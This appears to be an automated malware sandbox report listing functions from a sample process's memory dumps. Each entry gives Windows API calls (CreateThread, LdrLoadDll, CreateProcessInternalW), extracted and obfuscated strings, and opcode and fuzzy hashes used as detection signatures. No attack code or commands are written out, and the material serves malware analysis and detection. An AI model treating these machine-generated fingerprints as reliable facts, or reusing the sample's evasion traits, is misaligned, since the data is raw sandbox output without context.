                                                                                  • Opcode ID: 64a15e6c45a799872822cf0dcf7ac46a933c628447448f938c7dc3c06b919add
                                                                                  • Instruction ID: d8980ff5554ceb501ac53cfe7789d823131068de91a4b43dc79fc9e3758945ed
                                                                                  • Opcode Fuzzy Hash: 64a15e6c45a799872822cf0dcf7ac46a933c628447448f938c7dc3c06b919add
                                                                                  • Instruction Fuzzy Hash: 54012672D0135C7ADF109BE44C82EEF7B6DDF81754F048199F914A7240D6385E068BA1
                                                                                  Function 006E3CA0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 006E3D7B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 1fdc08a6907c13953fe09c2ee08094e52864dfca08c083a11694c04097a914f1
                                                                                  • Instruction ID: 821b934e9fe0590614fb46754f16a74928958486d30d95730c4f395f1f5cb91d
                                                                                  • Opcode Fuzzy Hash: 1fdc08a6907c13953fe09c2ee08094e52864dfca08c083a11694c04097a914f1
                                                                                  • Instruction Fuzzy Hash: 31318DB1601305BBD714DFA5CC84FEBB7BAAF84700F14451DBA196B280D770AA408BA4
                                                                                  Function 006DF709 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 062367b77982b2c9d353431175b0f1d93a89966c546ccafbd6c71e67538da020
                                                                                  • Instruction ID: 78c0315b243caa159b0497d72c355517252015026fa12d53107a2d264969ed2d
                                                                                  • Opcode Fuzzy Hash: 062367b77982b2c9d353431175b0f1d93a89966c546ccafbd6c71e67538da020
                                                                                  • Instruction Fuzzy Hash: C03130B5A0020A9FDB00DF98D8809EFB7BABF88304B108559E516EB354D771EE05CBA0
                                                                                  Function 006DF710 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 2389d1cd77c0c1f4d6cae6eaed10ff97e13f77748e01afd8717cac1612fb8e54
                                                                                  • Instruction ID: 11fb8df3106fe319c9f81162ad509c021f5769947341611668762465039444f6
                                                                                  • Opcode Fuzzy Hash: 2389d1cd77c0c1f4d6cae6eaed10ff97e13f77748e01afd8717cac1612fb8e54
                                                                                  • Instruction Fuzzy Hash: DA312FB5A0020A9FDB00DFD9D8809EFB7BABF88304B108559E506EB314D775EE058BA0
                                                                                  Function 006E99A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 006E99DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: k4m
                                                                                  • API String ID: 3298025750-870978497
                                                                                  • Opcode ID: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                  • Instruction ID: f4c294fd8bb81609b548e668ca0378aee23f338d3e024353dc69fd9415463dc8
                                                                                  • Opcode Fuzzy Hash: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                  • Instruction Fuzzy Hash: D5E092712002057BC614EE59DC41FAB73ADDFC5710F008019F908A7242D630BD1087B8
                                                                                  Function 006D4730 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006D47A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                  • Instruction ID: bc35d7277399094fa0debb39e97afeb5c415b5d9453a23e26a502d181c867a36
                                                                                  • Opcode Fuzzy Hash: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                  • Instruction Fuzzy Hash: 57015EB5D4020DABDF10DAE1DC42FDEB7799F54308F004199E91897241FA31EB08CB91
                                                                                  Function 006E9A30 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,006D84FE,00000010,?,?,?,00000044,?,00000010,006D84FE,?,?,?), ref: 006E9A90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                  • Instruction ID: 18e0b49326e9caac23b494884e154bc14f3718bea6fe8aff72bff6581c58a0ff
                                                                                  • Opcode Fuzzy Hash: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                  • Instruction Fuzzy Hash: 3601C4B2210208BBCB44DF99DC81EDB77ADEF8D754F008209BA09E7241D630F8518BA4
                                                                                  Function 006C9E10 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9E55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: accd3b204333f33eee4da8a0e696a1bdfaf0e614be526c0b1e6c3ee62bad8b78
                                                                                  • Instruction ID: 29d2ca6474caaf624686480c1f6b572c41740f37983b4970b63282968d3fc530
                                                                                  • Opcode Fuzzy Hash: accd3b204333f33eee4da8a0e696a1bdfaf0e614be526c0b1e6c3ee62bad8b78
                                                                                  • Instruction Fuzzy Hash: 9AF0657334171836D22061EA9C42FDB769DDF81B61F15001AFB0CDA1C1D9A5F90183E8
                                                                                  Function 006C9E0A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9E55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: e4081919a80f7c86484bf291a71307900d49d1187bf772709e055ec0d8989206
                                                                                  • Instruction ID: 9324e1f5bcb51556f8a4ca883756e0a8eefdf4e7987ff3e6d136fdab1debd859
                                                                                  • Opcode Fuzzy Hash: e4081919a80f7c86484bf291a71307900d49d1187bf772709e055ec0d8989206
                                                                                  • Instruction Fuzzy Hash: 7AF0E5B32807143AD23066E99C02FE76299CF96B60F25011DF70DAA2C1C9A1B902C7EC
                                                                                  Function 006E9960 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(006D1BF9,?,006E6183,006D1BF9,006E589F,006E6183,?,006D1BF9,006E589F,00001000,?,?,00000000), ref: 006E9999
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction ID: 13f7ed7bfa17fed1a2a0070d1154dddae89932bed57e548bb6b58a4dafdad37d
                                                                                  • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction Fuzzy Hash: C4E092712002087FC614EE59DC42FAB37ADDFC9750F008019F908A7242C670FC1087B9
                                                                                  Function 006D8540 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 006D856C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 2018039860a9adb35563105fde544d1fbe1ea6a95555c4e7d685595568e2857d
                                                                                  • Instruction ID: a35a29ebd22dee88e696c6c99ebd454d7673629789e76f202aa0acb2c673c453
                                                                                  • Opcode Fuzzy Hash: 2018039860a9adb35563105fde544d1fbe1ea6a95555c4e7d685595568e2857d
                                                                                  • Instruction Fuzzy Hash: 96E02031D003081BE72065FCEC45FA533495744F64F18C660B95DCB3D1E934F9118290
                                                                                  Function 006D82CD Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,006D1F00,006E81DF,006E589F,006D1EC6), ref: 006D8363
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: f0cc406917c0cbb273357772776b46c32e5c538d7d09d287f40eaa79920eb81d
                                                                                  • Instruction ID: a180f413b23bce42bee84d7c227583a4543f3bf26adc12d4ddf49fcf15491e9e
                                                                                  • Opcode Fuzzy Hash: f0cc406917c0cbb273357772776b46c32e5c538d7d09d287f40eaa79920eb81d
                                                                                  • Instruction Fuzzy Hash: 72E0C272A403047FE250A6F4DC07F65238A9B40B94F154078BE0CDB382FC64E90242E4
                                                                                  Function 006D8330 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,006D1F00,006E81DF,006E589F,006D1EC6), ref: 006D8363
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 286ba91103c92feaf7c336ad5aabada764f6f5e8fd78604007f9a057e5668fcb
                                                                                  • Instruction ID: d98fcc0da1415c2db89d490d16ef4ee856612d1119058987858e5c1af1f05620
                                                                                  • Opcode Fuzzy Hash: 286ba91103c92feaf7c336ad5aabada764f6f5e8fd78604007f9a057e5668fcb
                                                                                  • Instruction Fuzzy Hash: F4D05E716403087BE640A6E5CC07F6A32CEAB45B95F154078BA4CDB3C2ED64F50086E9
                                                                                  Function 02F52C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: fca3a3b654caf2cf445139021c9a22dc950ee477ff3d7f8fd9d7ba133d15a451
                                                                                  • Instruction ID: 4bd305a3dee6cd2b11032581ccc63ee08d9cd8932041fa571e0440da395477af
                                                                                  • Opcode Fuzzy Hash: fca3a3b654caf2cf445139021c9a22dc950ee477ff3d7f8fd9d7ba133d15a451
                                                                                  • Instruction Fuzzy Hash: 69B09B71D015D5D5DA11E7604A0C7177910A7D0791F15C165D7030641F4739C1D5E175
                                                                                  Function 006DF81C Relevance: 1.3, APIs: 1, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Uninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 3861434553-0
                                                                                  • Opcode ID: 114e3ed8338419dc1fc77d60c60e433c911dfc90e0a788213cb06ee5ec728eb0
                                                                                  • Instruction ID: f3e08045ed09a11533feed82827910882e865169512e3e8baf1c2ae93620b220
                                                                                  • Opcode Fuzzy Hash: 114e3ed8338419dc1fc77d60c60e433c911dfc90e0a788213cb06ee5ec728eb0
                                                                                  • Instruction Fuzzy Hash: DC11E736A10209ABDB10EBA8DC81FEE776EEF48314F4441A9F90D97342DB35AD0587E0

                                                                                  Non-executed Functions

                                                                                  Function 00DC04D8 Relevance: .1, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864651418.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_dc0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 516cf0092a273cd676debb2814757595a844c6a2a0e1e148994c73f51f6bee84
                                                                                  • Instruction ID: 6eaa5e30a531e8c49062c6d31c4a0854619937f294bab62146e5aea3e72a945b
                                                                                  • Opcode Fuzzy Hash: 516cf0092a273cd676debb2814757595a844c6a2a0e1e148994c73f51f6bee84
                                                                                  • Instruction Fuzzy Hash: 1841FE7051CF4E8FD768EF689081B76B7E2FB55300F50052DD98AC3252EB74D8468BA5
                                                                                  Function 00DCDFAA Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864651418.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_dc0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3558027158
                                                                                  • Opcode ID: e0d76da973dc9e9afa2a2757dc803c9f43d442ce4fccf21f6a86c7a9a92e3bfc
                                                                                  • Instruction ID: bd329d4ba82c7b847d0fce6f5c7ad498baa35e26d44b1b5247903dc2cf15c5c7
                                                                                  • Opcode Fuzzy Hash: e0d76da973dc9e9afa2a2757dc803c9f43d442ce4fccf21f6a86c7a9a92e3bfc
                                                                                  • Instruction Fuzzy Hash: 43915FF04083988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B95
                                                                                  Function 00DC3B21 Relevance: 52.6, Strings: 42, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864651418.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_dc0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
                                                                                  • API String ID: 0-606234297
                                                                                  • Opcode ID: 6df663d635a1a1722d89c8c0425043685b6303dc4a697d6caa717b5cfa18fba6
                                                                                  • Instruction ID: 2cd05beeb23011e217a2593995bed5f45d81ba8f01816e0be4132bab34863669
                                                                                  • Opcode Fuzzy Hash: 6df663d635a1a1722d89c8c0425043685b6303dc4a697d6caa717b5cfa18fba6
                                                                                  • Instruction Fuzzy Hash: C9413EB094434CEBCF158F85E980ADEBB70FF01340F905219E9486F368CB758A56CB99
                                                                                  Function 02F52890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 250d1e73101bacc3504159d887fc8a6f6ef9400bed6aa6911e3cb4310ae82f3c
                                                                                  • Instruction ID: 63427479568e4741da062ac045f815e4d75df8d6dd93f94952f8b71f7b9f34c6
                                                                                  • Opcode Fuzzy Hash: 250d1e73101bacc3504159d887fc8a6f6ef9400bed6aa6911e3cb4310ae82f3c
                                                                                  • Instruction Fuzzy Hash: 5151E7B2E041267EDB10DB9888D097EF7B8FB08285710826AEF65D7641D734DE40DBA0
                                                                                  Function 02FC2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 63a6dd40e4b4f9ef1768933ea758d5f2d4f24ea3ab61cabec993e49c52d0bbe1
                                                                                  • Instruction ID: 953fd86c738600ce16ea98f3201d61e1dcd6d66e1969d50a9844da6ee3ec64f6
                                                                                  • Opcode Fuzzy Hash: 63a6dd40e4b4f9ef1768933ea758d5f2d4f24ea3ab61cabec993e49c52d0bbe1
                                                                                  • Instruction Fuzzy Hash: A751F675A00646AFDB20DE5CCE9097FB7F9EB44280B24885DEA96D7781DB74DA00CB60
                                                                                  Function 02F47630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F84742
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F84655
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F84725
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F84787
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F846FC
                                                                                  • ExecuteOptions, xrefs: 02F846A0
                                                                                  • Execute=1, xrefs: 02F84713
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: 549e9d94ba8a202a08063ad39c3cf2871d36bcb711daefdd24a947a618104325
                                                                                  • Instruction ID: 475677172ea85d14dd970d9e3edcf698b640881e956b4e4e3a680c13bf293f51
                                                                                  • Opcode Fuzzy Hash: 549e9d94ba8a202a08063ad39c3cf2871d36bcb711daefdd24a947a618104325
                                                                                  • Instruction Fuzzy Hash: 6B510A31A4021DAAEF10BB64DC85FADBBBAEF05384F440199DB05AB190EBB19E45CF50
                                                                                  Function 02FE6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: 8ac4a6926527ca61dd48f9ece49046f2e6ea9cf9463444139e0e31f89706bfa0
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: 93023871508345AFC706DF18C890A6FB7EAEFD4784F40892DFA969B264DB31E905CB42
                                                                                  Function 02F5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: ad5eee0ab8ee7e2459de9838c15ab8b593a6f9835e034daa92600565d9c1450d
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: CA81B370E052699EDF248E68C891BFEBBB2AF4539CF184199DF61A72D8C7349841CB50
                                                                                  Function 02FC20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
